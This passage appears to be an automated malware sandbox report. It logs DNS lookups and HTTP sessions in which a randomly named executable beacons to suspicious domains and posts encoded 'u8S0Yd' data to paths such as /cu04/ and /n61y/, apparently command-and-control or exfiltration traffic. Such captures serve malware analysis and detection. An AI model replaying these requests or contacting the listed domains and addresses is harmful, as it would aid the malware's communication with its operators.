                                                            Apr 1, 2025 09:03:18.225131035 CEST53531171.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:33.655392885 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:34.691181898 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:35.685921907 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:37.698370934 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:41.698461056 CEST5109153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:45.714806080 CEST6032653192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:45.803064108 CEST53603261.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:46.731940985 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:47.729831934 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:48.745316029 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:50.745239973 CEST6515753192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:51.849114895 CEST53651571.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:51.849191904 CEST53651571.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:52.856453896 CEST5291453192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:52.957776070 CEST53529141.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:03:59.018047094 CEST5719553192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:03:59.165592909 CEST53571951.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:13.358824968 CEST5505853192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:13.486046076 CEST53550581.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:26.945852041 CEST5292153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:27.948574066 CEST5292153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:28.039468050 CEST53529211.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:36.092961073 CEST5284353192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:37.089287043 CEST5284353192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:37.178788900 CEST53528431.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:45.242784023 CEST6377853192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:45.339003086 CEST53637781.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:04:53.407294035 CEST6136353192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:04:53.507210970 CEST53613631.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:08.374314070 CEST5223153192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:08.502291918 CEST53522311.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:16.562122107 CEST5818653192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:16.816375017 CEST53581861.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:31.671436071 CEST5925953192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:31.922574997 CEST53592591.1.1.1192.168.2.4
                                                            Apr 1, 2025 09:05:45.436824083 CEST6218253192.168.2.41.1.1.1
                                                            Apr 1, 2025 09:05:45.624501944 CEST53621821.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Apr 1, 2025 09:03:17.952788115 CEST192.168.2.41.1.1.10x89f7Standard query (0)www.031233226.xyzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:33.655392885 CEST192.168.2.41.1.1.10xc12eStandard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:34.691181898 CEST192.168.2.41.1.1.10xc12eStandard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:35.685921907 CEST192.168.2.41.1.1.10xc12eStandard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:37.698370934 CEST192.168.2.41.1.1.10xc12eStandard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:41.698461056 CEST192.168.2.41.1.1.10xc12eStandard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:45.714806080 CEST192.168.2.41.1.1.10xc690Standard query (0)www.031233226.xyzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:46.731940985 CEST192.168.2.41.1.1.10xb676Standard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:47.729831934 CEST192.168.2.41.1.1.10xb676Standard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:48.745316029 CEST192.168.2.41.1.1.10xb676Standard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:50.745239973 CEST192.168.2.41.1.1.10xb676Standard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:52.856453896 CEST192.168.2.41.1.1.10x2514Standard query (0)www.vipstargold.buzzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:59.018047094 CEST192.168.2.41.1.1.10x7155Standard query (0)www.woodsplace.netA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.358824968 CEST192.168.2.41.1.1.10xcc34Standard query (0)www.sigaque.todayA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:26.945852041 CEST192.168.2.41.1.1.10xe6b8Standard query (0)www.kitculture.shopA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:27.948574066 CEST192.168.2.41.1.1.10xe6b8Standard query (0)www.kitculture.shopA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:36.092961073 CEST192.168.2.41.1.1.10x8e56Standard query (0)www.f66el619d.shopA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:37.089287043 CEST192.168.2.41.1.1.10x8e56Standard query (0)www.f66el619d.shopA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:45.242784023 CEST192.168.2.41.1.1.10x4b0bStandard query (0)www.alplace.siteA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:53.407294035 CEST192.168.2.41.1.1.10xe282Standard query (0)www.cruycq.infoA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:08.374314070 CEST192.168.2.41.1.1.10xc7a7Standard query (0)www.elevatetextiles.netA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:16.562122107 CEST192.168.2.41.1.1.10xc924Standard query (0)www.qzsazi.infoA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:31.671436071 CEST192.168.2.41.1.1.10x25abStandard query (0)www.l33900.xyzA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:45.436824083 CEST192.168.2.41.1.1.10xb0b3Standard query (0)www.milp.storeA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Apr 1, 2025 09:03:18.225131035 CEST1.1.1.1192.168.2.40x89f7No error (0)www.031233226.xyz031233226.xyzCNAME (Canonical name)IN (0x0001)false
                                                            Apr 1, 2025 09:03:18.225131035 CEST1.1.1.1192.168.2.40x89f7No error (0)031233226.xyz144.76.229.203A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:45.803064108 CEST1.1.1.1192.168.2.40xc690No error (0)www.031233226.xyz031233226.xyzCNAME (Canonical name)IN (0x0001)false
                                                            Apr 1, 2025 09:03:45.803064108 CEST1.1.1.1192.168.2.40xc690No error (0)031233226.xyz144.76.229.203A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:51.849114895 CEST1.1.1.1192.168.2.40xb676Server failure (2)www.vipstargold.buzznonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:51.849191904 CEST1.1.1.1192.168.2.40xb676Server failure (2)www.vipstargold.buzznonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:52.957776070 CEST1.1.1.1192.168.2.40x2514Server failure (2)www.vipstargold.buzznonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:59.165592909 CEST1.1.1.1192.168.2.40x7155No error (0)www.woodsplace.netwoodsplace.netCNAME (Canonical name)IN (0x0001)false
                                                            Apr 1, 2025 09:03:59.165592909 CEST1.1.1.1192.168.2.40x7155No error (0)woodsplace.net13.248.213.45A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:03:59.165592909 CEST1.1.1.1192.168.2.40x7155No error (0)woodsplace.net76.223.67.189A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.32.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.64.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.112.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.80.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.96.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.16.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:13.486046076 CEST1.1.1.1192.168.2.40xcc34No error (0)www.sigaque.today104.21.48.1A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:28.039468050 CEST1.1.1.1192.168.2.40xe6b8Name error (3)www.kitculture.shopnonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:37.178788900 CEST1.1.1.1192.168.2.40x8e56Name error (3)www.f66el619d.shopnonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:45.339003086 CEST1.1.1.1192.168.2.40x4b0bName error (3)www.alplace.sitenonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:04:53.507210970 CEST1.1.1.1192.168.2.40xe282No error (0)www.cruycq.info47.83.1.90A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:08.502291918 CEST1.1.1.1192.168.2.40xc7a7Name error (3)www.elevatetextiles.netnonenoneA (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:16.816375017 CEST1.1.1.1192.168.2.40xc924No error (0)www.qzsazi.info47.83.1.90A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:31.922574997 CEST1.1.1.1192.168.2.40x25abNo error (0)www.l33900.xyz162.218.30.235A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:45.624501944 CEST1.1.1.1192.168.2.40xb0b3No error (0)www.milp.store194.9.94.85A (IP address)IN (0x0001)false
                                                            Apr 1, 2025 09:05:45.624501944 CEST1.1.1.1192.168.2.40xb0b3No error (0)www.milp.store194.9.94.86A (IP address)IN (0x0001)false
                                                            • www.031233226.xyz
                                                            • www.woodsplace.net
                                                            • www.sigaque.today
                                                            • www.cruycq.info
                                                            • www.qzsazi.info
                                                            • www.l33900.xyz
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449723144.76.229.203806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:03:18.423346996 CEST460OUTGET /elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.031233226.xyz
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:03:18.600884914 CEST479INHTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:03:18 GMT
                                                            Server: Apache
                                                            Content-Length: 315
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44972413.248.213.45806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:00.293005943 CEST730OUTPOST /cu04/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.woodsplace.net
                                                            Origin: http://www.woodsplace.net
                                                            Referer: http://www.woodsplace.net/cu04/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 53 34 42 56 41 69 4a 75 34 43 71 59 46 6e 53 48 78 32 73 31 78 6a 47 69 4d 78 31 74 31 79 69 35 46 41 3d 3d
                                                            Data Ascii: u8S0Yd=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==
                                                            Apr 1, 2025 09:04:00.390646935 CEST73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.44972513.248.213.45806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:02.938894033 CEST750OUTPOST /cu04/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.woodsplace.net
                                                            Origin: http://www.woodsplace.net
                                                            Referer: http://www.woodsplace.net/cu04/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 6f 59 58 4d 42 73 63 37 4a 71 6d 39 43 61 76 63 6a 6e 4e 78 4d 79 4e 64 52 55 4f 39 51 2b 55 57 49 59 58 4f 56 62 63 4c 6a 57 32 4b 6b 58 61 6e 7a 75 6c 33 62 37 72 64 72 69 75 76 38 57 4c 50 4d 37 58 30 6b 4f 33 74 74 53 43 74 59 2b 34 6d 78 53 72 65 48 33 46 61 74 59 47 37 38 79 61 50 2f 55 6a 78 6d 78 74 7a 42 7a 77 54 2b 49 52 30 79 57 64 46 57 38 7a 51 78 32 2f 32 4f 70 68 47 69 65 4f 67 48 62 4f 6d 45 47 7a 32 68 4b 47 44 45 58 68 77 56 72 67 49 44 78 74 33 2b 43 79 37 41 68 66 64 67 48 4e 69 6a 6a 69 52 52 32 38 5a 34 78 66 77 65 43 6a 61 64 34 4e 7a 39 76 52 75 68 43 72 49 47 65 57 49 61 47 55 3d
                                                            Data Ascii: u8S0Yd=LgavgYig9OZ/oYXMBsc7Jqm9CavcjnNxMyNdRUO9Q+UWIYXOVbcLjW2KkXanzul3b7rdriuv8WLPM7X0kO3ttSCtY+4mxSreH3FatYG78yaP/UjxmxtzBzwT+IR0yWdFW8zQx2/2OphGieOgHbOmEGz2hKGDEXhwVrgIDxt3+Cy7AhfdgHNijjiRR28Z4xfweCjad4Nz9vRuhCrIGeWIaGU=
                                                            Apr 1, 2025 09:04:03.030935049 CEST73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.44972613.248.213.45806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:05.578892946 CEST7007OUTPOST /cu04/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.woodsplace.net
                                                            Origin: http://www.woodsplace.net
                                                            Referer: http://www.woodsplace.net/cu04/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 6f 59 58 4d 42 73 63 37 4a 71 6d 39 43 61 76 63 6a 6e 4e 78 4d 79 4e 64 52 55 4f 39 51 2b 63 57 49 4b 50 4f 55 38 41 4c 69 57 32 4b 6e 58 61 6d 7a 75 6c 71 62 37 7a 52 72 69 53 5a 38 6b 2f 50 4e 70 76 30 32 73 76 74 6b 43 43 74 65 2b 34 69 38 79 72 51 48 7a 59 54 74 63 75 37 38 78 65 50 2f 55 6a 78 30 7a 56 7a 66 7a 77 56 2b 49 52 6d 38 32 64 42 57 38 79 46 78 33 37 6d 4f 59 42 47 6e 4f 65 67 46 4a 57 6d 59 57 7a 77 69 4b 48 63 45 58 39 78 56 72 34 6d 44 77 6c 64 2b 79 53 37 42 6e 79 6b 78 57 52 35 37 42 2b 4e 45 78 4d 65 36 68 76 67 58 67 2f 31 58 4b 52 71 2f 4f 4a 69 6e 77 36 52 42 2f 47 55 44 42 55 30 6b 2b 4d 53 38 2b 42 58 55 46 4c 58 6f 31 42 65 56 6f 6d 37 7a 75 6e 73 30 77 38 44 2f 36 4c 6c 46 74 42 6f 4b 61 4b 6c 68 57 6f 47 76 43 55 53 57 51 6b 50 56 37 6e 61 6e 61 61 57 74 62 37 32 43 53 64 76 49 54 4c 55 32 44 73 62 6e 57 49 61 58 48 58 71 32 48 54 55 6b 63 4e 69 53 4c 71 63 47 48 6e 69 78 45 62 37 48 37 7a 44 54 70 30 4d 37 2f 59 [TRUNCATED]
                                                            Data Ascii: u8S0Yd=LgavgYig9OZ/oYXMBsc7Jqm9CavcjnNxMyNdRUO9Q+cWIKPOU8ALiW2KnXamzulqb7zRriSZ8k/PNpv02svtkCCte+4i8yrQHzYTtcu78xeP/Ujx0zVzfzwV+IRm82dBW8yFx37mOYBGnOegFJWmYWzwiKHcEX9xVr4mDwld+yS7BnykxWR57B+NExMe6hvgXg/1XKRq/OJinw6RB/GUDBU0k+MS8+BXUFLXo1BeVom7zuns0w8D/6LlFtBoKaKlhWoGvCUSWQkPV7nanaaWtb72CSdvITLU2DsbnWIaXHXq2HTUkcNiSLqcGHnixEb7H7zDTp0M7/Yw7gJj7srhl0BIGW+1J1RSdyVb0jcNoA4/m3Ig4hDkD0QhTNmd2w9yNIIkOBsMQVUCongkhp9kiImmwzN60C9J7ywuOI5vkt0EHVhCwDchTKiQDOjoEDhNnwQdaTrXbR9K+3tGMZBn5BRF0LraRdhgij5/qUs27balhOSdorp/ErWp1zOj1Bi1R6Rjxvn2pkc0MeL6mKr8yJwpH8FLWTiWRmGq5NKS2Yv788LUFFc9/d9VI/iIT3WMjAXVkbg9eacFaLZpHAxAlemLj+J6oLLvDAd/tyLuYZ/YsIeXhrXU2EiH82mSSNc9Lmvvq9Xs7SBD3BZXSXU2QsKXoYmPYtZ0+Fm6usIuhq30wBX8bXZM7WiCShFtXlLspR7TtlZSRToZt9dpqnufj2iBbRfTyt7ybUKsel3nWl2FfjISeSvv+OYKnqECJAKaImz5poa5GEgigAMSBaUCBK2UasJ6+oD3sTJyb6B6HxTH/XrMrsXBeNUqgCIF1ncZQLLjEFdZfbVBPOW8G9mBLCvBjaBExq8p2wmt085Axjc0LQxiucVhzhaTVG2sqIUO6nyqsyLp0BBiFUVzBPdJzzGutcysUjvAU9F9Au4UI0Qs1uf2It4rBSDJFOuw/Gkvr9lt+IBLynRK1HVKvVQd+7nN5jYXbqsCWR+ZEy9uUrkAF [TRUNCATED]
                                                            Apr 1, 2025 09:04:05.678824902 CEST73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.44972713.248.213.45806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:08.217838049 CEST461OUTGET /cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.woodsplace.net
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:04:08.340334892 CEST379INHTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Tue, 01 Apr 2025 07:04:08 GMT
                                                            content-length: 258
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 76 4e 54 61 3d 56 34 68 78 36 38 4a 70 6b 26 75 38 53 30 59 64 3d 47 69 79 50 6a 75 44 59 71 73 5a 76 71 4c 4b 6d 59 4d 34 47 48 4e 75 72 4c 4b 54 6b 6e 31 4a 61 45 54 45 6d 53 45 53 43 46 2f 78 54 51 2f 47 31 65 74 59 38 30 58 4b 51 32 47 57 52 78 2b 31 64 5a 5a 58 48 79 79 71 44 34 58 65 35 4e 50 71 30 2b 2b 58 43 6f 68 2b 70 41 4a 55 48 69 41 6a 52 41 55 78 58 77 50 47 77 38 42 58 55 2b 47 6d 69 31 51 70 6a 62 78 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk="}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.449728104.21.32.1806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:13.597109079 CEST727OUTPOST /n61y/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.sigaque.today
                                                            Origin: http://www.sigaque.today
                                                            Referer: http://www.sigaque.today/n61y/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 4d 4d 4e 2f 52 4e 35 57 46 46 6b 46 66 71 6f 61 70 75 6d 41 41 64 4b 6a 52 47 4f 48 75 4b 7a 52 61 53 63 77 36 31 36 58 46 7a 44 5a 49 6a 77 69 63 72 6e 52 43 64 62 6f 48 65 4f 61 6c 4a 56 61 36 35 34 34 58 43 4c 6d 72 58 66 33 44 38 4b 53 54 6a 2f 54 4b 4a 32 45 36 31 6f 4d 56 32 78 45 51 42 6c 43 35 39 6a 77 70 30 61 71 50 39 76 6d 42 52 69 5a 72 79 74 6a 2f 42 38 45 46 37 2f 73 2f 55 75 36 32 69 59 67 39 38 6a 41 72 79 69 31 67 69 62 63 48 2b 4c 54 43 6c 56 42 4f 44 65 46 46 64 47 59 78 37 39 58 33 50 58 73 74 46 41 7a 72 6b 51 63 53 6b 70 71 42 50 68 4d 50 6a 57 42 63 67 3d 3d
                                                            Data Ascii: u8S0Yd=MMN/RN5WFFkFfqoapumAAdKjRGOHuKzRaScw616XFzDZIjwicrnRCdboHeOalJVa6544XCLmrXf3D8KSTj/TKJ2E61oMV2xEQBlC59jwp0aqP9vmBRiZrytj/B8EF7/s/Uu62iYg98jAryi1gibcH+LTClVBODeFFdGYx79X3PXstFAzrkQcSkpqBPhMPjWBcg==
                                                            Apr 1, 2025 09:04:13.975892067 CEST1011INHTTP/1.1 404 Not Found
